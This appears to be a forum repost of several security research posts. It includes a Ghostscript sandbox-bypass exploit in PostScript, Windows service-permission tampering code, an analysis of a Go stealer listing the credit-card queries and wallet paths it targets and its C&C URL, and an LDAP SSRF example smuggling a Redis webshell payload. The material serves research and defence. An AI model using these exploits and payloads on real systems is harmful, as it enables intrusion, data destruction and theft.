- I can "convert" an array into a string this way, which will then treat the internal ref array as a byte array (i.e. the ref pointer in the value field of this array is now treated as a byte buffer of the same length). This allows me to read/write the in-memory representation of any object that I put into the array. This is very powerful, as strings in PostScript are not terminated by a null character, but rather treated as a byte buffer of length specified by rsize, so any byte in the buffer can be read or written. Note that this does not give me any out-of-bounds (OOB) read/write, as the resulting string will have the same length as the original array; since each ref is 16 bytes, the resulting byte buffer will only cover about 1/16 of the buffer originally allocated for the ref array. This is what I'm going to do in the exploit.
- I can of course do it the other way round and "convert" a string into an array of the same length. As explained above, the resulting ref array will be about 16 times larger than the original string buffer, which allows me to do OOB reads and writes. I have not pursued this route.

There is one more technical difficulty that I need to overcome. The fake object pinst actually calls two functions, with the output of one feeding into the other:

    return pinst->type->procs.uses_base_space(
               pinst->type->procs.get_pattern(pinst)
           );

As seen from above, uses_base_space takes the return value of pinst->type->procs.get_pattern(pinst), which is now zpop(pinst), as its input.
As zpop returns 0, this is likely to cause a null pointer dereference when I use any built-in PostScript operator in place of uses_base_space, unless I can find an operator that doesn't use the context pointer i_ctx_p at all. If only there existed a query language I could use to find particular patterns in a code base! Here's the QL query I used to find the operator I was looking for:

from Function f
where
  f.getName().matches("z%") and
  f.getFile().getAbsolutePath().matches("%/psi/%") and
  // Look for functions with a single parameter of the right type:
  f.getNumberOfParameters() = 1 and
  f.getParameter(0).getType().hasName("i_ctx_t *") and
  // Make sure the function is actually defined:
  exists(Stmt stmt | stmt.getEnclosingFunction() = f) and
  // And doesn't access `i_ctx_p`
  not exists(FieldAccess fa, Function f2 |
    fa.getQualifier().getType().hasName("i_ctx_t *") and
    fa.getEnclosingFunction() = f2 and
    f.calls*(f2)
  )
  // And doesn't dereference `i_ctx_p`
  and not exists(PointerDereferenceExpr expr, Variable v, Function f2 |
    expr.getAnOperand() = v.getAnAccess() and
    v.getType().hasName("i_ctx_t *") and
    expr.getEnclosingFunction() = f2 and
    f.calls*(f2)
  )
select f

My QL query uses some heuristics to identify PostScript operators. Their names normally start with z and they are defined inside the psi directory. Also, they take an argument of type i_ctx_t *. I then look for functions that do not dereference the argument nor access its fields, either themselves or in functions that they call. This query does not look for dereferences of the parameter i_ctx_p in particular, but of any variable of type i_ctx_t *, which is a good enough approximation.

You can run your own QL queries on over 130,000 GitHub, Bitbucket, and GitLab projects at LGTM.com. You can use either the online query console, or you can install the QL for Eclipse plugin and run queries locally on a code snapshot (downloadable from the repo's project page on LGTM). Ghostscript is not developed on GitHub, Bitbucket, or GitLab, so it has not been analyzed by LGTM.com, but you can download a Ghostscript code snapshot here.

This query gives me 6 results. The function ucache seems to be just what we need. Let's try to put this together and see if it works. First, set up the fake object pinst:

%Create the fake array pinst
/pinst 100 array def
%array that stores the pop-ucache gadget
/pop_ucache 100 array def
%put pop into pop_ucache to cause more type confusions by decrementing osp
systemdict /pop get pop_ucache exch 1 exch put
%put ucache in (no op) to avoid crash
systemdict /ucache get pop_ucache exch 0 exch put
%replace the functions with pop and ucache
pinst 1 pop_ucache put

Now we need to create a large array object and store it in the 39th element of pinst. Its metadata tas will then be interpreted as the stack pointer address osp. I'll use the PostScript operator put as its first element, then use pop to change its type to string and read off the address of the zput function.
%make a large enough array and change its type with pop
/arr 32767 array def
%get the address of the put operator
systemdict /put get arr exch 0 exch put
%store arr as 39th element of pinst and modify its type
pinst 39 arr put
%Create the argument to setpattern
/impl 100 dict def
impl /Implementation [pinst] put
%Change type of arr to string
0 1 1291 {impl setpattern} for
% Print the address of zput as string
pinst 39 get 8 8 getinterval

It is a bit unfortunate that the type_attrs value for an array is 0x4 while the value for a string is 0x12, so I have to underflow the ushort to go from array to string, which is why I have to run impl setpattern 1291 times. As can be seen in the screenshot above, the fake array gets converted into a string and I get the address of zput. I actually have to run this outside of gdb, or at least enable address randomization, to get it to work, as gdb seems to always allocate arr at 0x7ffff0a35078; with memory randomization, I've not failed a single time with the above. I can also use this to write bytes to any position in arr.

Sandbox bypass

Now that I can read and write arbitrary bytes of an arbitrary PostScript object, it is just a matter of deciding what the easiest thing to do is. My original plan was to simply overwrite the LockFilePermissions parameter and then call file, which would allow arbitrary command execution, like I did with CVE-2018-19475. However, it turns out that in order for this to work, I would also need to fake a number of other objects in the execution context i_ctx_p, which seems too complicated. Instead, I'm just going to call a simple but powerful function that I am not supposed to have access to in SAFER mode, then use it to overwrite some security settings, which will then allow me to run arbitrary shell commands. The operator forceput (also used by Tavis Ormandy in one of his Ghostscript vulnerabilities) fits the bill nicely. Summarizing, here is what I need to do now:

1. Create a fake operand stack with the arguments that I want to supply to forceput;
2. Overwrite the location in pinst that stores the address of the operand stack pointer with the address of what I created above;
3. Get the address of forceput and replace pinst->type->procs.get_pattern with its address.

To achieve (1), recall that the operand stack is nothing more than an array of ref. To fake it, I just need to create an array with my arguments:

/operand 3 array def
operand 0 userparams put
operand 1 /LockFilePermissions put
operand 2 false put

I can then store it in arr to retrieve the address of this array. Instead of using arr, I'm just going to reuse pinst and put it in the 31st element instead:

pinst 31 operand 2 1 getinterval put

Note that instead of putting operand into the 31st element of pinst, I create a new array starting from operand[2] and use that new array. This is because PostScript functions look for their arguments by going down the operand stack, so I need to set it up so that when osp decreases, it will get my other arguments. Using the trick from the previous section, I can now read off the address of this fake stack pointer and write it to the appropriate location in pinst. This sets up pinst for calling forceput. Although forceput is not accessible from SAFER mode, I can simply take the address of zput and add the offset from zput to zforceput to obtain the address of zforceput (as this offset is not randomized).
In the debug binary compiled with commit 81f3d1e this offset is 0x437, and in the release binary compiled with the same commit, or in the release code of 9.25, this offset is 0x4B0. After doing this, I can simply call restore to write the new LockFilePermissions parameter to the current device, and then run an arbitrary shell command (again, remember to turn address randomization ON). Here's a screenshot of launching a calculator from sandboxed Ghostscript:

By overwriting other entries in userparams, such as PermitFileReading and PermitFileWriting, it is also possible to gain arbitrary file access. Systems like AppArmor may be effective at preventing PDF viewers from starting arbitrary shell commands, but they don't stop a specially-crafted PDF file from wiping a user's entire home directory when opened. Or, if you're in a more forgiving mood, you could delete all files from a user's desktop and subsequently flood it with Super Mario bricks: https://youtube.com/watch?v=5vVxN-vfCsI

For more videos about our security research and exploits, please visit the Semmle YouTube channel.

If you'd like to run your own QL queries on open source software: you can! We've made our QL technology freely available for running queries on open source projects that have been analyzed by LGTM.com. At the time of writing, LGTM.com has analyzed around 130,000 GitHub, Bitbucket, and GitLab repositories. For each of these projects, you can download a code snapshot from LGTM.com for running queries. In addition, you'll need the QL for Eclipse plugin. Unfortunately, Ghostscript is not developed on GitHub.com and has therefore not been analyzed by LGTM.com, so we've made the Ghostscript code snapshot available here.

Sursa: https://lgtm.com/blog/ghostscript_CVE-2018-19134_exploit?
-
Introducing Armory: External Pentesting Like a Boss
Posted by Dan Lawson on February 04, 2019

TLDR; We are introducing Armory, a tool that adds a database backend to dozens of popular external and discovery tools. This allows you to run the tools directly from Armory, automatically ingest the results back into the database, and use the new data to supply targets for other tools.

Why?

Over the past few years I've spent a lot of time conducting some relatively large-scale external penetration tests. This ends up being a massive exercise in managing various text files, with a moderately unhealthy dose of grep, cut, sed, and sort. It gets even more interesting as you discover new domains, new IP ranges or other new assets and must start the entire process over again. Long story short, I realized that if I could automate handling the data, my time would be freed up for actual testing and exploitation. So, Armory was born.

What?

Armory is written in Python. It works with both Python2 and Python3. It is composed of the main application, as well as modules and reports. Modules are wrapper scripts that run public (or private) tools using either data from the command line or data from the database. The results are then either processed and imported into the database or just left in their text files for manual perusal. The database handles the following types of data:

BaseDomains: Base domain names, mainly used in domain enumeration tools
Domains: All discovered domains (and subdomains)
IPs: IP addresses discovered
CIDRs: The CIDRs in which these IP addresses reside, along with their owners, pulled from whois data
ScopeCIDRs: CIDRs that are explicitly in scope. This is separated out from CIDRs since whois servers will often return much larger CIDRs than may belong to a target/customer.
Ports: Port numbers and services, usually populated by Nmap, Nessus, or Shodan
Users: Users discovered via various means (leaked cred databases, LinkedIn, etc.)
Creds: Sets of credentials discovered

Additionally, Basedomains, Domains and IPs have two types of scoping:

Active scope: Host is in scope and can have bad-touch tools run on it (e.g. nmap, gobuster, etc.).
Passive scope: Host isn't directly in scope but can have enumeration tools run against it (e.g. aquatone, sublist3r, etc.). If something is Active scoped, it should also be Passive scoped.

The main purpose of Passive scoping is to handle situations where you may want data ingested into the database that may be useful to your customers, but you do not want to actively attack those targets. Take the following scenario: You are doing discovery and an external penetration test for a client, trying to find all of their assets. You find a few dozen random domains registered to that client, but you are explicitly scoped to the subnets that they own. During the subdomain enumeration, you discover multiple development web servers hosted on Digital Ocean. Since you do not have permission to test against Digital Ocean, you don't want to actively attack them. However, this would still be valuable information for the client to receive. Therefore you can leave those hosts scoped Passive: you will not run any active tools against them, but you can still generate reports later on that include the passive hosts, thereby capturing the data without breaking scope.

Full details: https://depthsecurity.com/blog/introducing-armory-external-pentesting-like-a-boss
-
Posted on February 7, 2019

Demystifying Windows Service "permissions" configuration

Some days ago, I was reflecting on the SeRestorePrivilege and wondering if a user with this privilege could alter a Service Access, for example: grant to everyone the right to stop/start the service during a "restore" task. (Don't expect some cool bypass or exploit here.)

As you probably know, each object in Windows has DACLs & SACLs which can be configured. The most "intuitive" are obviously file and folder permissions, but there are plenty of other securable objects: https://docs.microsoft.com/en-us/windows/desktop/secauthz/securable-objects

Given that our goal is Service permissions, first we will try to understand how they work and how we can manipulate them. Service security can be split into 2 parts:

- Access Rights for the Service Control Manager
- Access Rights for a Service

We will focus on Access Rights for the service, which means who can start/stop/pause the service and so on. For a detailed explanation take a look at this article from Microsoft: https://docs.microsoft.com/it-it/windows/desktop/Services/service-security-and-access-rights

How can we change the service security settings?

Configuring Service Security and Access Rights is not as immediate a task as, for example, changing the DACLs of file or folder objects. Keep also in mind that it is limited to privileged users like Administrators and the SYSTEM account. There are some built-in and third party tools which permit changing the DACLs of a service, for example:

- Windows "sc.exe". This program has a lot of options, and with "sdset" it is possible to modify the security settings of a service, but you have to specify them in the cryptic SDDL (Security Descriptor Definition Language). The opposite command, "sdshow", will list the SDDL. Note that the interactive user (IU) cannot start or stop the BITS service because the necessary rights (RP, WP) are missing. I'm not going to explain this stuff in depth; if interested, look here: https://support.microsoft.com/en-us/help/914392/best-practices-and-guidance-for-writers-of-service-discretionary-acces
- subinacl.exe from the Windows Resource Kit. This one is much easier to use. In this example we will grant to everyone the right to start BITS (Background Intelligent Transfer Service).
- Service Security Editor, a free GUI utility to set permissions for any Windows Service.
- And of course, via Group Policy, PowerShell, etc.

All these tools and utilities rely on this Windows API call, accessible only to highly privileged users:

BOOL SetServiceObjectSecurity(
    SC_HANDLE            hService,
    SECURITY_INFORMATION dwSecurityInformation,
    PSECURITY_DESCRIPTOR lpSecurityDescriptor
);

Where are the service security settings stored?

Good question! First of all, we have to keep in mind that services have a "default" configuration: Administrators have full control, standard users can only interrogate the service, etc. Services with a non-default configuration have their settings stored in the registry under this subkey:

HKLM\System\CurrentControlSet\Services\<servicename>\security

This subkey hosts a REG_BINARY value which is the binary form of the security settings. These "non default" registry settings are read when the Service Control Manager starts (upon boot) and stored in memory. If we change the service security settings with one of the tools we mentioned before, changes are immediately applied and stored in memory. During the shutdown process, the new registry values are written.

And the Restore Privilege? You got it!

With the SeRestorePrivilege, even if we cannot use the SetServiceObjectSecurity API call, we can restore registry keys, including the security subkey... Let's make an example: we want to grant to everyone full control over the BITS service. On our Windows test machine, we just modify the settings with one of the tools. After that, we restart our box and copy the new binary value of the security key. Now that we have the right values, we just need to "restore" the security key with them. For this purpose we are going to use a small C program; here is the relevant part:

byte data[] = {
    0x01, 0x00, 0x14, 0x80, 0xa4, 0x00, 0x00, 0x00, 0xb4, 0x00, 0x00, 0x00,
    0x14, 0x00, 0x00, 0x00, 0x34, 0x00, 0x00, 0x00, 0x02, 0x00, 0x20, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x02, 0xc0, 0x18, 0x00, 0x00, 0x00, 0x0c, 0x00,
    0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00,
    0x20, 0x02, 0x00, 0x00, 0x02, 0x00, 0x70, 0x00, 0x05, 0x00, 0x00, 0x00,
    0x00, 0x02, 0x14, 0x00, 0xff, 0x01, 0x0f, 0x00, 0x01, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x05, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x00,
    0xff, 0x01, 0x0f, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05,
    0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00,
    0xff, 0x01, 0x0f, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x8d, 0x01, 0x02, 0x00,
    0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x04, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x14, 0x00, 0x8d, 0x01, 0x02, 0x00, 0x01, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x05, 0x06, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00,
    0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x20, 0x00, 0x00, 0x00,
    0x20, 0x02, 0x00, 0x00
};

HKEY hk;
LSTATUS stat = RegCreateKeyExA(HKEY_LOCAL_MACHINE,
    "SYSTEM\\CurrentControlSet\\Services\\BITS\\Security", 0, NULL,
    REG_OPTION_BACKUP_RESTORE, KEY_SET_VALUE, NULL, &hk, NULL);
stat = RegSetValueExA(hk, "security", 0, REG_BINARY, (const BYTE*)data, sizeof(data));
if (stat != ERROR_SUCCESS)
{
    printf("[-] Failed writing! (%ld)\n", stat);
    exit(EXIT_FAILURE);
}
printf("Setting registry OK\n");

We need of course to enable the SE_RESTORE_NAME privilege in our process token first.
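A minimal sketch of that step with standard Win32 calls (error handling trimmed; this helper is our own illustration, not part of the original post):

#include <windows.h>

BOOL EnableRestorePrivilege(void)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!LookupPrivilegeValueA(NULL, "SeRestorePrivilege", &tp.Privileges[0].Luid))
    {
        CloseHandle(hToken);
        return FALSE;
    }

    /* AdjustTokenPrivileges "succeeds" even when the token does not actually
       hold the privilege, so check for ERROR_NOT_ALL_ASSIGNED as well */
    BOOL ok = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL)
              && GetLastError() != ERROR_NOT_ALL_ASSIGNED;
    CloseHandle(hToken);
    return ok;
}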
In an elevated shell, we execute the binary on the victim machine, and after the reboot we are able to start BITS even with a low-privileged user.

And the Take Owner Privilege?

The concept is the same: we first need to take ownership of the registry key, grant ourselves the necessary access rights on the key (SetNamedSecurityInfo() API calls), and then do the same trick we have seen before. But wait, one moment! What if we take ownership of the service itself?

dwRes = SetNamedSecurityInfoW(
    pszService,
    SE_SERVICE,
    OWNER_SECURITY_INFORMATION,
    takeownerboss_sid,
    NULL,
    NULL,
    NULL);

Yes, this works, but when we then set the permissions on the object (again with SetNamedSecurityInfo) we get an error. If we do this with admin rights, it works... Probably the function calls the underlying SetServiceObjectSecurity, which modifies the permissions of the service stored "in memory", and this is precluded to non-admins.

Final thoughts

So we were able to change the Service Access Rights with our "restoreboss" user. Nothing really useful, I think, but sometimes it's just fun to try to understand some parts of Windows' internal mechanisms, do you agree?

Sursa: https://decoder.cloud/2019/02/07/demystifying-windows-service-permissions-configuration/
-
Analyzing a new stealer written in Golang
Posted: January 30, 2019 by hasherezade

Golang (Go) is a relatively new programming language, and it is not common to find malware written in it. However, new variants written in Go are slowly emerging, presenting a challenge to malware analysts. Applications written in this language are bulky and look much different under a debugger from those that are compiled in other languages, such as C/C++.

Recently, a new variant of Zebocry malware was observed that was written in Go (detailed analysis available here). We captured another type of malware written in Go in our lab. This time, it was a pretty simple stealer detected by Malwarebytes as Trojan.CryptoStealer.Go. This post will provide detail on its functionality, but also show methods and tools that can be applied to analyze other malware written in Go.

Analyzed sample

This stealer is detected by Malwarebytes as Trojan.CryptoStealer.Go:

992ed9c632eb43399a32e13b9f19b769c73d07002d16821dde07daa231109432
513224149cd6f619ddeec7e0c00f81b55210140707d78d0e8482b38b9297fc8f
941330c6be0af1eb94741804ffa3522a68265f9ff6c8fd6bcf1efb063cb61196 – HyperCheats.rar (original package)
3fcd17aa60f1a70ba53fa89860da3371a1f8de862855b4d1e5d0eb8411e19adf – HyperCheats.exe (UPX packed)
0bf24e0bc69f310c0119fc199c8938773cdede9d1ca6ba7ac7fea5c863e0f099 – unpacked

Behavioral analysis

Under the hood, Golang calls the Windows API, and we can trace the calls using typical tools, for example, PIN tracers. We see that the malware searches for files under the following paths:

"C:\Users\tester\AppData\Local\Uran\User Data\"
"C:\Users\tester\AppData\Local\Amigo\User\User Data\"
"C:\Users\tester\AppData\Local\Torch\User Data\"
"C:\Users\tester\AppData\Local\Chromium\User Data\"
"C:\Users\tester\AppData\Local\Nichrome\User Data\"
"C:\Users\tester\AppData\Local\Google\Chrome\User Data\"
"C:\Users\tester\AppData\Local\360Browser\Browser\User Data\"
"C:\Users\tester\AppData\Local\Maxthon3\User Data\"
"C:\Users\tester\AppData\Local\Comodo\User Data\"
"C:\Users\tester\AppData\Local\CocCoc\Browser\User Data\"
"C:\Users\tester\AppData\Local\Vivaldi\User Data\"
"C:\Users\tester\AppData\Roaming\Opera Software\"
"C:\Users\tester\AppData\Local\Kometa\User Data\"
"C:\Users\tester\AppData\Local\Comodo\Dragon\User Data\"
"C:\Users\tester\AppData\Local\Sputnik\Sputnik\User Data\"
"C:\Users\tester\AppData\Local\Google (x86)\Chrome\User Data\"
"C:\Users\tester\AppData\Local\Orbitum\User Data\"
"C:\Users\tester\AppData\Local\Yandex\YandexBrowser\User Data\"
"C:\Users\tester\AppData\Local\K-Melon\User Data\"

Those paths point to data stored by browsers. One interesting fact is that one of the paths points to the Yandex browser, which is popular mainly in Russia.

The next searched path is the desktop:

"C:\Users\tester\Desktop\*"

All files found there are copied to a folder created in %APPDATA%. The folder "Desktop" contains all the TXT files copied from the Desktop and its sub-folders (example from our test machine shown above). After the search is completed, the files are zipped, and we can see the package being sent to the C&C (cu23880.tmweb.ru/landing.php).
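To make the described behavior concrete, here is a heavily simplified Go sketch of the collect-zip-upload loop. Everything in it (paths, the upload URL) is our own illustration, not the malware's actual code:

package main

import (
	"archive/zip"
	"bytes"
	"io/ioutil"
	"net/http"
	"os"
	"path/filepath"
	"strings"
)

func main() {
	buf := new(bytes.Buffer)
	zw := zip.NewWriter(buf)

	// Walk the desktop and add every .txt file to the archive
	desktop := filepath.Join(os.Getenv("USERPROFILE"), "Desktop")
	filepath.Walk(desktop, func(path string, info os.FileInfo, err error) error {
		if err != nil || info.IsDir() || !strings.HasSuffix(strings.ToLower(path), ".txt") {
			return nil
		}
		data, err := ioutil.ReadFile(path)
		if err != nil {
			return nil
		}
		w, _ := zw.Create(filepath.Base(path))
		w.Write(data)
		return nil
	})
	zw.Close()

	// Upload the archive to the C&C endpoint
	http.Post("http://example.invalid/landing.php", "application/zip", buf)
}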
Golang-compiled binaries are usually big, so it's no surprise that the sample has been packed with UPX to minimize its size. We can unpack it easily with the standard UPX. As a result, we get a plain Go binary. The export table reveals the compilation path and some other interesting functions, and looking at those exports, we can get an idea of the static libraries used inside.

Many of those functions (trampoline-related) can be found in the module go-sqlite3: https://github.com/mattn/go-sqlite3/blob/master/callback.go. The function crosscall2 comes from the Go runtime, and it is related to calling Go from C/C++ applications (https://golang.org/src/cmd/cgo/out.go).

Tools

For the analysis, I used IDA Pro along with the IDAGolangHelper scripts written by George Zaytsev. First, the Go executable has to be loaded into IDA. Then, we can run the script from the menu (File -> Script file). We then see a menu giving access to particular features. First, we need to determine the Golang version (the script offers some helpful heuristics); in this case, it will be Go 1.2. Then, we can rename functions and add standard Go types. After completing those operations, the code looks much more readable. Below, you can see the view of the functions before and after using the scripts: before, only the exported functions are named; after, most of the functions have their names automatically resolved and added.

Many of those functions come from statically-linked libraries, so we need to focus primarily on functions annotated as main_*, which are specific to the particular executable.

Code overview

In the function "main_init", we can see the modules that will be used in the application. It is statically linked with the following modules:

GRequests (https://github.com/levigross/grequests)
go-sqlite3 (https://github.com/mattn/go-sqlite3)
try (https://github.com/manucorporat/try)

Analyzing this function can help us predict the functionality; i.e., looking at the above libraries, we can expect that the malware will be communicating over the network, reading SQLite3 databases, and throwing exceptions. Other initializers suggest the use of regular expressions, the zip format, and reading environment variables.

This function is also responsible for initializing and mapping strings. We can see that some of them are first base64-decoded. Among the initialized strings, we see references to cryptocurrency wallets, such as Ethereum and Monero.

The main function of a Golang binary is annotated "main_main". Here, we can see that the application creates a new directory (using the function os.Mkdir). This is the directory where the found files will be copied. After that, several Goroutines are started using runtime.newproc. (Goroutines can be used similarly to threads, but they are managed differently; more details can be found here.) Those routines are responsible for searching for the files. Meanwhile, the SQLite module is used to parse the databases in order to steal data. The malware then zips it all into one package, and finally, the package is uploaded to the C&C.

What was stolen?

To see exactly which data the attacker is interested in, we can look more closely at the functions that perform the SQL queries, and at the related strings. Strings in Golang are stored in bulk, in concatenated form; a single chunk from such a bulk is retrieved on demand, by a given offset and length. Therefore, seeing from which place in the code each string was referenced is not so easy. For example, in one code fragment an "sqlite3" database is opened (a string of length 7 was retrieved); in another, a full query was retrieved from the chunk of strings by the given offset and length. Let's take a look at which data those queries were trying to fetch.
Fetching the strings referenced by the calls, we can retrieve and list all of them:

select name_on_card, expiration_month, expiration_year, card_number_encrypted, billing_address_id FROM credit_cards
select * FROM autofill_profiles
select email FROM autofill_profile_emails
select number FROM autofill_profile_phone
select first_name, middle_name, last_name, full_name FROM autofill_profile_names

We can see that the browser's databases are queried in search of data related to online transactions: credit card numbers and expiration dates, as well as personal data such as names and email addresses.

The paths to all the files being searched are stored as base64 strings. Many of them are related to cryptocurrency wallets, but we can also find references to the Telegram messenger.

Software\\Classes\\tdesktop.tg\\shell\\open\\command
\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\
\\AppData\\Roaming\\Electrum\\wallets\\default_wallet
\\AppData\\Local\\Torch\\User Data\\
\\AppData\\Local\\Uran\\User Data\\
\\AppData\\Roaming\\Opera Software\\
\\AppData\\Local\\Comodo\\User Data\\
\\AppData\\Local\\Chromium\\User Data\\
\\AppData\\Local\\Chromodo\\User Data\\
\\AppData\\Local\\Kometa\\User Data\\
\\AppData\\Local\\K-Melon\\User Data\\
\\AppData\\Local\\Orbitum\\User Data\\
\\AppData\\Local\\Maxthon3\\User Data\\
\\AppData\\Local\\Nichrome\\User Data\\
\\AppData\\Local\\Vivaldi\\User Data\\
\\AppData\\Roaming\\BBQCoin\\wallet.dat
\\AppData\\Roaming\\Bitcoin\\wallet.dat
\\AppData\\Roaming\\Ethereum\\keystore
\\AppData\\Roaming\\Exodus\\seed.seco
\\AppData\\Roaming\\Franko\\wallet.dat
\\AppData\\Roaming\\IOCoin\\wallet.dat
\\AppData\\Roaming\\Ixcoin\\wallet.dat
\\AppData\\Roaming\\Mincoin\\wallet.dat
\\AppData\\Roaming\\YACoin\\wallet.dat
\\AppData\\Roaming\\Zcash\\wallet.dat
\\AppData\\Roaming\\devcoin\\wallet.dat

Big but unsophisticated malware

Some of the concepts used in this malware remind us of other stealers, such as Evrial, PredatorTheThief, and Vidar. It has similar targets and also sends the stolen data as a ZIP file to the C&C. However, there is no proof that the author of this stealer is linked with those cases.

When we take a look at the implementation as well as the functionality of this malware, it's rather simple. Its big size comes from many statically-compiled modules. Possibly, this malware is in the early stages of development: its author may have just started learning Go and is experimenting. We will be keeping an eye on its development.

At first, analyzing a Golang-compiled application might feel overwhelming because of its huge codebase and unfamiliar structure. But with the help of proper tools, security researchers can easily navigate this labyrinth, as all the functions are labeled. Since Golang is a relatively new programming language, we can expect that the tools to analyze it will mature with time.

Is malware written in Go an emerging trend in threat development? It's a little too soon to tell. But we do know that awareness of malware written in new languages is important for our community.

Sursa: https://blog.malwarebytes.com/threat-analysis/2019/01/analyzing-new-stealer-written-golang/
-
SSRF Protocol Smuggling in Plaintext Credential Handlers: LDAP

SSRF protocol smuggling involves an attacker injecting one TCP protocol into a dissimilar TCP protocol. A classic example is using gopher (i.e. the first protocol) to smuggle SMTP (i.e. the second protocol):

gopher://127.0.0.1:25/%0D%0AHELO%20localhost%0D%0AMAIL%20FROM%3Abadguy@evil.com%0D%0ARCPT%20TO%3Avictim@site.com%0D%0ADATA%0D%0A ....

The key point above is the use of the CRLF characters (i.e. %0D%0A), which break up the commands of the second protocol. This attack is only possible with the ability to inject CRLF characters into a protocol.

Almost all LDAP client libraries support plaintext authentication, or a non-SSL simple bind. For example, the following is an LDAP authentication example using Python 2.7 and the python-ldap library:

import ldap
conn = ldap.initialize("ldap://[SERVER]:[PORT]")
conn.simple_bind_s("[USERNAME]", "[PASSWORD]")

In many LDAP client libraries it is possible to insert a CRLF inside the username or password field. Because LDAP is a rather plain TCP protocol, this makes it immediately of note.

import ldap
conn = ldap.initialize("ldap://0:9000")
conn.simple_bind_s("1\n2\n\3\n", "4\n5\n6---")

You can see the CRLF characters are sent in the request:

# nc -lvp 9000
listening on [::]:9000 ...
connect to [::ffff:127.0.0.1]:9000 from localhost:39250 ([::ffff:127.0.0.1]:39250)
0`1
2
3
4
5
6---

Real World Example

Imagine the case where the user can control the server and the port. This is very common in LDAP configuration settings. For example, there are many web applications that support LDAP configuration as a feature. Some common examples are embedded devices (e.g. webcams, routers), multi-function printers, multi-tenancy environments, and enterprise appliances and applications.

Putting It All Together

If a user can control the server/port and CRLF can be injected into the username or password, this becomes an interesting SSRF protocol smuggle. For example, here is a Redis remote code execution payload smuggled completely inside the password field of the LDAP authentication in a PHP application. In this case the web root is '/app' and the Redis server would need to be able to write to the web root:

<?php
$adServer = "ldap://127.0.0.1:6379";
$ldap = ldap_connect($adServer);
# RCE smuggled in the password field
$password = "_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A %0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A %243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%244%0D%0A/app%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A %2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A";
$ldaprdn = 'domain' . "\\" . "1\n2\n3\n";
ldap_set_option($ldap, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($ldap, LDAP_OPT_REFERRALS, 0);
$bind = @ldap_bind($ldap, $ldaprdn, urldecode($password));
?>

Client Libraries

In my opinion, the client library is functioning correctly by allowing these characters. Rather, it's the application's job to filter username and password input before passing it to an LDAP client library.
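A minimal sketch of that application-side check, using the python-ldap library shown earlier (the helper name is our own):

def safe_simple_bind(conn, username, password):
    # Reject CR/LF before the credentials ever reach the LDAP client library
    for value in (username, password):
        if "\r" in value or "\n" in value:
            raise ValueError("CR/LF characters are not allowed in credentials")
    conn.simple_bind_s(username, password)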
I tested out four LDAP libraries that are packaged with common languages, all of which allow CRLF in the username or password field:

Library            Tested In
python-ldap        Python 2.7
com.sun.jndi.ldap  JDK 11
php-ldap           PHP 7
net-ldap           Ruby 2.5.2

Summary Points

• If you are an attacker and find an LDAP configuration page, check if the username or password field allows CRLF characters. Typically the initial test will involve sending the request to a listener that you control to verify these characters are not filtered.
• If you are a defender, make sure your application is filtering CRLF characters (i.e. %0D%0A).

Blackhat USA 2019

@AndresRiancho and I (@0xrst) have an outstanding training coming up at Blackhat USA 2019. There are two dates available and you should join us!!! It is going to be fun.

Sursa: https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/
-
Justin Steven
Published on Feb 6, 2019
https://twitch.tv/justinsteven

In this stream we rework our exploit for the 64-bit split write4 binary from ROP Emporium (https://ropemporium.com/), and in doing so we get completely nerd-sniped by a strange ret2system crash.
-
idenLib - Library Function Identification

When analyzing malware or 3rd party software, it's challenging to identify statically linked libraries and to understand what a function from a library is doing.

idenLib.exe is a tool for generating library signatures from .lib files.
idenLib.dp32 is an x32dbg plugin to identify library functions.
idenLib.py is an IDA Pro plugin to identify library functions.

Any feedback is greatly appreciated: @_qaz_qaz

How does idenLib.exe generate signatures?

1. Parse the input file (.lib file) to get a list of function addresses and function names.
2. Take the last opcode from each instruction and generate an MD5 hash from it (you can change the hashing algorithm).
3. Save the signature under the SymEx directory. If the input filename is zlib.lib, the output will be zlib.lib.sig; if zlib.lib.sig already exists under the SymEx directory, from a previous execution or from a previous version of the library, the next execution will append any new signatures. If you execute idenLib.exe several times with different versions of the .lib file, the .sig file will include all unique function signatures.

Signature file format: hash function_name

Generating library signatures

x32dbg / IDA Pro plugin usage:

1. Copy the SymEx directory under x32dbg/IDA Pro's main directory
2. Apply signatures

Only x86 is supported (adding x64 should be trivial).

Useful links:
Detailed information about C Run-Time Libraries (CRT)

Credits
Disassembly powered by Zydis
Icon by freepik

Sursa: https://github.com/secrary/idenLib
-
